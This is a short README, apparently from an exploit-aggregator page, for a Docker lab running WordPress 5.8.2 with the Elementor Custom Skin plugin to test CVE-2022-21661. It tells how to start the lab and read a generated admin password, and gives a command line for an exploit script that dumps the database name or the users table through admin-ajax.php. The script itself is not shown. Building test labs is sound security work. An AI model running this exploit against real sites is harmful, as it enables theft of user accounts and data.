## https://sploitus.com/exploit?id=BAADD68D-8FDC-5A3C-9C51-37DE91E411FB
# Wordpress 5.8.2 CVE-2022-21661 Vuln enviroment
This enviroment is setup with the Elementor Custom Skin, plugin
to test the CVE-2022-21661.
to start the enviroment
`console
wp-lab$ ./start.sh
`
To get the admin password get the log from the running container, a new pwd is
generated every time the container is booted.
`console
$wp-lab$ docker logs test
[*] user admin pwd: inpJbxn+mhWWNSgEAlsU2A== localip: 172.17.0.2
`
to run the exploit, replace \<payloadid\> with:
1. dump db name
2. dump users table.
``
python3 sploit.py http://<target-ip>/wp-admin/admin-ajax.php <payload-id>
``